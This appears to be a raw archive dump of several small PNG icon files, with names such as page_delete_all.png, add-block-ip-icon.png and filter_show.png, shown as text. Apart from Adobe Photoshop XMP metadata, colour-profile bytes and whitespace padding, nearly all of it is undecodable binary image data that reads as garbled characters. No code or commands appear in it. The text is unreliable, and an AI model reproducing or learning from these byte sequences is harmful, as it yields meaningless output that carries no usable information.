���T�*�s��.�:�rc�V�j6��דW�q�K��?Y-'��9R#���Pk��]�"�	�i�;�S�[�Q7�Qo�&�7u������i�"�gX={��p�ߎ��{_�Aުtўqb�H��e��[�v\j�IЉ��hk�d?>{�+��yڎl�����f��b�� n>XǬ�/M��<͸|�c:�L?���T�hz�U�����Q���ߵ���Y�Q��0��ϸdv6&��#n�����mGYU&�7En��n��%�rid�y�x1�X����n:�?�{l�KdYӷ>%������q���5�����91��Y�b��K����'���G��3]��S��
��6����:k�?���:9����'�
ֻ��O8H��W_BW�c_���>�_��EY�1f�	F"Ȝy�����0�p⸗�φ��,��,�i�S#S�q�?6�:�O4��O�̇b���N�&]L0x8�K-�>!�,�K���x�S�9�3w����?�R��s�tXµ�vsp1]����0�0MX��$�+�\���3j0��	0i�Q5��IEND�B`�images/page_delete_all.png000060400000045551152434416630011623 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�;�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-18T11:55:41+04:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-11-18T11:55:41+04:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-11-18T11:55:41+04:00</xmp:ModifyDate>
         <xmpMM:InstanceID>xmp.iid:b45f81b7-616b-aa48-bfe3-e06088b7c771</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:c0d2b1c3-8dc9-11e5-908b-ca098794a1d9</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:eae46ca9-b0f0-ae40-8adb-9948b6ba16c6</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:eae46ca9-b0f0-ae40-8adb-9948b6ba16c6</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:55:41+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:b45f81b7-616b-aa48-bfe3-e06088b7c771</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:55:41+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <dc:format>image/png</dc:format>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�ZJ cHRMz%������u0�`:�o�_�F�IDATx���SW��ٳ�͆,!A@"�rQ�6�2PP1�P�ӎӎ���CLJ��A���O}��L�ֱ��F�J�"-^PP�1�&��!%dL����{�=��|��.��o��'�n�?l��LM� L����8�F����x�C�7¡�
!��K����aq�2\�V�	�]-��;_�X�Jl��}#n˖�m�%���9�'�4yO��#�����ßnِV�Yβ���	�U�2lL��,^k�����n�Nn�Nܞ
t"�"������Ô?G�B���V��#z�fH�/���`��x�S���8��>�,�mM��y"�@}�XlkB�
Y3��26�����0]�Ѳ�Y�z�f�V�|o�^���ٌ2�^�#�y鵕�̇�nަ�MA%]����*)O�|u���"�B���_.��Q���*�v
��eY��j�2U�e5C��y��o5U`(2�T"7?(�N���Bj]e�Hʰ��&�Ϻo6�ь�,vk-DH��-mv*5��1��gb�ES�ӡReU�ب��-5�Ó���h�呁9l*�|wH�CV���ꮂ��~��:S��hq<]�w8�l'�WH�V@W�<]�d�)tc9�]���N}!/(����ޫ�o^��N}ij*��	Y17�)�m*r�Z�65��ga��e��*�$W�!]��N��ÉY�O�#��ߣ���67#
�i��D~��!Ii��ʘ7��c���K�L��x�a~��E���S��y�r��m�Y���s,u{1��F.���хQ��kt�FS�#���"��dTYX��;�X����3�1��j�� �	������0SS�Ҷ�ɨ1a��d�.��[����y�w0��:1�N�'SDi�O���v�0>ca�Ӧ'�-g�;��л^��d���Ժ
��+b�`�D^!��R�������id϶9��,u�еԽ8��D~��n/��
0,Z�����$)�� �bP�l]��;�����|#�tS�bg�4x+*K�Zj��ރ(�ZF�/v���^&�yTIy�z$)~W�y�b���u�U6��,~W�^�֦�[�)�o�����6��Ā����fH�%{xa���+6-�K)i&nES���bgKbi.����*��1Ic��{����N���é�5i��<:ȸk����=;N4Ƽ��s��Γi͈���{:���\�n�])Z�͊�-�߯������L]����5�m�'KIEND�B`�images/add-block-ip-icon.png000060400000044504152434416630011706 0ustar00�PNG


IHDRH-�	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�=�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-18T11:49:01+04:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-11-20T14:33:07+04:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-11-20T14:33:07+04:00</xmp:ModifyDate>
         <xmpMM:InstanceID>xmp.iid:07c52c6e-edeb-124a-b2f9-f6b2121d9c3c</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:10635ec4-8f72-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:992e764c-5069-9243-9f4a-e0c5f660e368</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:992e764c-5069-9243-9f4a-e0c5f660e368</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:49:01+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:597f170c-f0ff-6e4a-b6a7-3564ac8222cb</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:49:01+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:07c52c6e-edeb-124a-b2f9-f6b2121d9c3c</stEvt:instanceID>
                  <stEvt:when>2015-11-20T14:33:07+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:87fd4ba7-8c73-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:a229b3b6-8dc8-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:d31096f8-8dc8-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <dc:format>image/png</dc:format>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>14</exif:PixelXDimension>
         <exif:PixelYDimension>14</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�:n! cHRMz%������u0�`:�o�_�F�IDATxڴ�K�0D��T�1X�f�1�"��K�Ao�S�1Re��B�R$'�I왈��G���q4�ވP�n
?F�8U�V[w>�w�%�zv��Sw���dS/�D��,�cZ�i�^>3��E�u�kUm+��|���k`Z�����
�� �ZzIEND�B`�images/move_cursor.png000060400000003054152434416630011070 0ustar00�PNG


IHDR�hxUtEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:F183CE328E9711E5B593AD6F52FE2BEE" xmpMM:InstanceID="xmp.iid:F183CE318E9711E5B593AD6F52FE2BEE" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:910f0c91-8e97-11e5-9083-e9f04772f1a0" stRef:documentID="adobe:docid:photoshop:910f0c91-8e97-11e5-9083-e9f04772f1a0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>t��qxIDATx�b�{��� ��j�#����(�ŝ�y�b��	Kk�CY/������|��!�bD6��L.~5VQ%���k�%T��5��^��21s@LD�
I;3��@�A",@���^���?^��ˈն�7A@aw>�!����])3;����"VSY�,4���oo���E)�,�r:�����???M"2�ClDDY`�F)0��e�	+&G��8y�X8	(����W6���y�J���!(%�#� �!�/,����a@RV;�
�0ع��>م���ݕ��V_y˨��i���P�|qw9�Bԡ�Io��Y�������fsp˼��d�B�J# �HHY4IX�7TL1׌�(f!>�bf²��$_L:_nj������oo�R#ӓk�~}E�����$T"���R��(�bJ!<�:P��F02�B���ׁ���_�_���'�~}��:� +� 8�2������7AQyv.I`༃eP�a��0*��������0�? 22���������"
b"�&U`a�{�:߿��z�h.	������ǗG���)���c�I
 2D�)IL��h��IEND�B`�images/filter_show.png000060400000010700152434416630011046 0ustar00�PNG


IHDR@@�iq�
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs������//IDATx��[]h\E��<��!Q*h���P��4�@�D"��@"�$�����$E���0�-�P�)F��B�
�Ђ��� ؇V� ��}{g�ٹ��3s��
���;w��|3s�3�-{{{"
:1�S?>>w�"0N;��?�+����=J*�%�����!�)�K>��>K"41o��O�n��D4�x����&@���ao��%x�Wv���q?3	}��WW�^X����ȶx7Gz|Fi��i�U�3���v:��np�r�3#,�6�Da���4�����r�e
�~1^!���3��}h|jT�'�xRM�t�IUh�IF��xR�f2�T@�O*ЌƓ�0~'EYA�ƿ%�5~W��	#΀�S�y�5�!�c��&�΂_�C:S҉#ŷ0�Cx�2>��Y�9�Mq�O1�k~�w�_�z�Ŏ�D��r@X�:(��g�����_�gz����B��M+f��O�(�?%��O���^�_�S�
��h�	���>G�1 6��)r���q.q�S��>@X��P�k��H�nt���`Nw��!Q��������y��W&H�W��nS���xF��|�<&��f܆~�� @N{���;�1(�QK��H��|Q:NV�i�XeL0�_3�k^���K0l�U�Y/��up�v{�
�s�V^P��79���)�/�M�څ�{��mor��C��A�5�s)m��z�ڦM��p�����B�	�NC��,����0�c���F��h���Qx]��}��@z򼈂!����g�2@�X�A����`t]D��h�6� �Ӯw�6i|A��N�����`��N��5�/�ϼ���Iz~}Do�=���*
�@P�W|AD~�DL�計�9�Fp;ӽ�-������#C�q����
���Ek�H �S�I�'JSc��B-A��kj�'���	�A'�`2��J{�B�O���u���+V/�3��G�BЪ]���@��:S(�W	�(�9g~&�
��ą�-�@)�������1
��)���J��v4�;�p���1
����X_��0��ԁ���ծ�����,`�S��N,�
�"��\�kϗ}�,���}o#,d.��LMU��h/�Y*50�al��C�2i�xnUkgDw�y�!0���aU
������:#�ۧJ��#���mx�&xIXP0���|@i�n��_������Y��R�����z��N{��{��mk��"���
��OVr&T%a��9a.��H�Z�a�퓸��!(<��"�O��nq�v����U���y��$:ļM�8xQ
